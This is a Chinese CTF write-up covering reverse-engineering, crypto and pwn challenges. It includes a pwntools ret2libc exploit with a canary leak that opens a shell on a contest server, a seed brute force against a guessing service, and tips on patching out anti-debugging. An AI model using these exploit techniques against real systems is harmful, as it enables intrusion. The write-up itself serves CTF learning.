REVERSE

(如果有佬出了rust的flag，求佬告訴我一下orz，太菜了，沒運(yùn)行出來，驗(yàn)證不了flag，麻煩佬們告訴下orz)

ezre

觀察程序，其中有base64、rc4、DES算法，
函數(shù)主要邏輯：輸入一串字符，前一位和后一位異或，再rc4加密，最后des加密，DES算法給出了加密解密，0x65為加密，0x64為解密

根據(jù)動(dòng)調(diào)來做，其中要注意的是tls函數(shù)對(duì)DES的密鑰和輸入的數(shù)據(jù)進(jìn)行了改動(dòng)


手動(dòng)把兩個(gè)tls函數(shù)判斷是否調(diào)試的地方改一下，繞過反調(diào)試，
可以手動(dòng)patch，也可以改ZF的值，
patch的話可以將74改成75，即可繞過反調(diào)試


輸入flag{12345678901234567890123456789012}

調(diào)試到異或后，

取出數(shù)組十六進(jìn)制數(shù)據(jù)為，

0A 0D 06 1C 4A 03 01 07 01 03 01 0F 01 09 01 03 01 07 01 03 01 0F 01 09 01 03 01 07 01 03 01 0F 01 09 01 03 4F 7D

經(jīng)過rc4加密后數(shù)據(jù)為

3F D8 A0 03 BA 63 83 A7 C6 AC AD B2 D6 25 30 5B 83 88 96 C7 CE B9 22 AC 8D 1F 79 91 7E 73 38 F4 FC 98 CA A9 B7 D4

可用這兩個(gè)異或，得到xor_key,
將此處的0x65改為0x64,并把最后判斷的數(shù)組byte_40B078提取出來，

在des解密前，將byte_40B668的數(shù)據(jù)改為byte_EBB078的值

11 C3 77 FE 6F D2 EB F1 CF 1E 50 4D 70 4C 25 29 
B5 CA 75 DB 8C 19 82 D9 1F E1 5E 58 EB 4B 51 D2 
75 F4 BA 1F 61 0D 45 BD

通過解密后，得到

3F D8 A0 03 E9 63 D2 F2 97 FD A8 B9 87 7B 36 5F D0 8B 91 C5 99 E2 20 A6 DF 4A 2C 93 27 7E 3A F7 FD CD 97 AB BC D4

最后寫個(gè)腳本逆推出flag

x1=[0x0A, 0x0D, 0x06, 0x1C, 0x4A, 0x03, 0x01, 0x07, 0x01, 0x03, 
  0x01, 0x0F, 0x01, 0x09, 0x01, 0x03, 0x01, 0x07, 0x01, 0x03, 
  0x01, 0x0F, 0x01, 0x09, 0x01, 0x03, 0x01, 0x07, 0x01, 0x03, 
  0x01, 0x0F, 0x01, 0x09, 0x01, 0x03, 0x4F, 0x7D]
x2=[0x3F, 0xD8, 0xA0, 0x03, 0xBA, 0x63, 0x83, 0xA7, 0xC6, 0xAC, 
  0xAD, 0xB2, 0xD6, 0x25, 0x30, 0x5B, 0x83, 0x88, 0x96, 0xC7, 
  0xCE, 0xB9, 0x22, 0xAC, 0x8D, 0x1F, 0x79, 0x91, 0x7E, 0x73, 
  0x38, 0xF4, 0xFC, 0x98, 0xCA, 0xA9, 0xB7, 0xD4]
result=[0x3F, 0xD8, 0xA0, 0x03, 0xE9, 0x63, 0xD2, 0xF2, 0x97, 0xFD, 
  0xA8, 0xB9, 0x87, 0x7B, 0x36, 0x5F, 0xD0, 0x8B, 0x91, 0xC5, 
  0x99, 0xE2, 0x20, 0xA6, 0xDF, 0x4A, 0x2C, 0x93, 0x27, 0x7E, 
  0x3A, 0xF7, 0xFD, 0xCD, 0x97, 0xAB, 0xBC, 0xD4]
xor_key=[]

for i in range(len(x1)):
    xor_key.append(x1[i]^x2[i])

for i in range(len(result)):
    result[i]^=xor_key[i]

for i in range(len(result)-2,-1,-1):
    result[i]^=result[i+1]
print(bytes(result))

得到flag{ba1c3aea1faf4067a565f0da97488d89}

rev_randomize2

(賽后在本地復(fù)現(xiàn)出的，遠(yuǎn)程環(huán)境關(guān)了，不知道遠(yuǎn)程行不行，如果有誤，輕點(diǎn)噴orz，方法比較爛，就硬爆隨機(jī)數(shù)種子，有點(diǎn)廢電腦，也有點(diǎn)看運(yùn)氣，隨機(jī)數(shù)種子小的話，就很快)
代碼主要邏輯，開始有初始分1000，猜對(duì)一個(gè)隨機(jī)數(shù)加1分，再猜對(duì)一個(gè)加2分，依此類推，猜錯(cuò)的話，規(guī)律一樣，當(dāng)分?jǐn)?shù)大于2000分，即可得到flag

sub_1289函數(shù)初始化隨機(jī)數(shù)種子

sub_12FE獲取生成的隨機(jī)數(shù)

然后開跑，這里的libc.so.6是直接用pwn題給的libc，記得在本地建個(gè)flag文件，不然跑了半天出了才知道還沒有文件(問就是我

from pwn import *
from ctypes import *

context.log_level = "debug"

# p = remote('39.107.71.45', '25568')
p = process('./randomize')
elf = cdll.LoadLibrary('./libc.so.6')

p.recvuntil(b'Now guess!\n')
p.sendline(b'1')
p.recvuntil(b'The number in my mind is ')
a = int(p.recvuntil(b'\n')[:-1])
p.recvuntil(b'Now guess!\n')
p.sendline(b'1')
p.recvuntil(b'The number in my mind is ')
b = int(p.recvuntil(b'\n')[:-1])
p.recvuntil(b'Now guess!\n')
p.sendline(b'1')
p.recvuntil(b'The number in my mind is ')
c = int(p.recvuntil(b'\n')[:-1])
print(a)
print(b)
print(c)

for i in range(0x10000000, 0x100000000):
    elf.srand(i)
    x = elf.rand() >> 15
    y = elf.rand() >> 15
    z = elf.rand() >> 15
    if x == a and y == b and z==c:
        print(hex(i))
        number=i
        break

elf.srand(number)
print(elf.rand() >> 15)
print(elf.rand() >> 15)
print(elf.rand() >> 15)
score=994
for i in range(100):
    payload = str(elf.rand() >> 15)
    p.sendline(payload.encode())
    score+=(i+1)
    if score>=2000:
    	break
    p.recvuntil(b'Now guess!\n')

p.interactive()

CRYPTO

math

沒有時(shí)間限制，就直接本地挨個(gè)解了，沒寫交互腳本

import hashlib
import itertools
from string import digits, ascii_letters, punctuation

# alpha_bet=digits+ascii_letters+punctuation
# strlist = itertools.product(alpha_bet, repeat=4)

# sha256="710dd6a2908fed2a9977445f021333d176f39060f3b14c8ebe73ab12d4946461"
# tail="QlRvhN1QqRksWBrG"

# xxxx=''

# for i in strlist:
    # data=i[0]+i[1]+i[2]+i[3]
    # data_sha=hashlib.sha256((data+str(tail)).encode('utf-8')).hexdigest()
    # if(data_sha==str(sha256)):
        # xxxx=data
        # break

# print(xxxx)

# pow(p,9)+pow(q,9): 2824822169624626054661488626925458420744715781080646942074253083493110409304139573698331220638806746185475842194119961243645804370254606328869920018072689414438851986763034645626556982418990163940800474549193470898195538208390077574728861492183878546810890489530709875694439708304188836872775133284206949916525601873082688977829638863138990316027434787047769932507784217745872371234159638863412009751336370516261263894787945468938670587885217215533551430379370918887017578135901512047635699889591590644728268209911213837545954673959103136577695532350503753325666353616999846273454813736702876968828262577312436890164868139215146941181825104314265142027185641195497429436701158821466597436322426101818844710031297488336024894303790150460476458932731090576824660354020881969224935848618388008509287249786048287099709905361669995934683044400119527112547308946141798312531702089592589519108535371095268166661526029944144811749355534331341058531140340843830280132820250819782775604064279338833095450886869781021370514423225666663969097910935332887127861068226704314810075641777615479058315604743490070494698514916318640565210625873112244649996112730726083223048152494260522865824835075057025248755461487069699219010214934196309822790800505679440651281428272245964425847552725070324370935048163205674057942566606069023173193117188785459966877961255640155226356782264373613291491124970651673222
# pow(p,3)+pow(q,3): 2170975452570130427181048521695873973135933481372313804498232310176782170227124595928130478815483294370924323759914604172695746976894120890757779825855362817255229290661676271054758017616180660951572648811631474401996380573736869074007533444837272191850638568203334900550339868176862783180156627459202829081595794230688694799962290853974633400675886602057846186352130394606371882689934371132063210289099864922945499792531454940004181032574377548535600071749073142


from z3 import *
p,q = Ints('p q')
solver = Solver()#創(chuàng)建一個(gè)求解器對(duì)象
solver.add(pow(p,9)+pow(q,9)==2824822169624626054661488626925458420744715781080646942074253083493110409304139573698331220638806746185475842194119961243645804370254606328869920018072689414438851986763034645626556982418990163940800474549193470898195538208390077574728861492183878546810890489530709875694439708304188836872775133284206949916525601873082688977829638863138990316027434787047769932507784217745872371234159638863412009751336370516261263894787945468938670587885217215533551430379370918887017578135901512047635699889591590644728268209911213837545954673959103136577695532350503753325666353616999846273454813736702876968828262577312436890164868139215146941181825104314265142027185641195497429436701158821466597436322426101818844710031297488336024894303790150460476458932731090576824660354020881969224935848618388008509287249786048287099709905361669995934683044400119527112547308946141798312531702089592589519108535371095268166661526029944144811749355534331341058531140340843830280132820250819782775604064279338833095450886869781021370514423225666663969097910935332887127861068226704314810075641777615479058315604743490070494698514916318640565210625873112244649996112730726083223048152494260522865824835075057025248755461487069699219010214934196309822790800505679440651281428272245964425847552725070324370935048163205674057942566606069023173193117188785459966877961255640155226356782264373613291491124970651673222)
solver.add(pow(p,3)+pow(q,3)==2170975452570130427181048521695873973135933481372313804498232310176782170227124595928130478815483294370924323759914604172695746976894120890757779825855362817255229290661676271054758017616180660951572648811631474401996380573736869074007533444837272191850638568203334900550339868176862783180156627459202829081595794230688694799962290853974633400675886602057846186352130394606371882689934371132063210289099864922945499792531454940004181032574377548535600071749073142)
if solver.check() == sat: #check()方法用來判斷是否有解，sat(satisify)表示滿足有解
    ans = solver.model() #model()方法得到解
    p1=ans[p].as_long()
    q1=ans[q].as_long()
    print(ans)
    print(p1)
    print(q1)
else:
    print("no ans!")
    
print((p1*q1) % (p1+q1))

PWN

ezstack

利用棧溢出和canary泄露的漏洞ret2libc

from pwn import *

context(arch="amd64", os="linux", log_level='debug')

e = ELF("./pwn2")
libc = ELF("libc.so.6")

p = remote('123.56.175.221', '17322')

puts_plt_addr = e.symbols["puts"]
puts_got_addr = e.got["puts"]
main_addr = e.symbols["main"]
rdi_addr = 0x401363
ret = 0x401364

p.sendline(b'a' * (0x30 - 10) + b'b')
p.recvuntil(b'b\n')
canary = u64(p.recv(8))
print(hex(canary))

payload = b'a' * (0x30 - 8) + p64(canary) + p64(0) + p64(rdi_addr) + p64(puts_got_addr) + p64(puts_plt_addr) + p64(main_addr)
p.sendlineafter(b'input: \n', payload)

puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
print(hex(puts_addr))

base_addr = puts_addr - libc.sym['puts']
system_addr = base_addr + libc.sym['system']
binsh_addr = base_addr + next(libc.search(b'/bin/sh'))
print(hex(system_addr))
print(hex(binsh_addr))

payload2 = b'a' * (0x30 - 8) + p64(canary) + p64(0) + p64(ret) + p64(rdi_addr) + p64(binsh_addr) + p64(system_addr)
p.sendlineafter(b'input: \n', payload2)
p.interactive()

拿到權(quán)限后，得到flag，flag{nEsqteUbHFuy8mQTNXH7abj43C5Q4NQG}文章來源地址http://www.zghlxwxcb.cn/news/detail-743886.html

到了這里，關(guān)于貴陽大數(shù)據(jù)及網(wǎng)絡(luò)安全精英對(duì)抗賽-解題賽WP的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！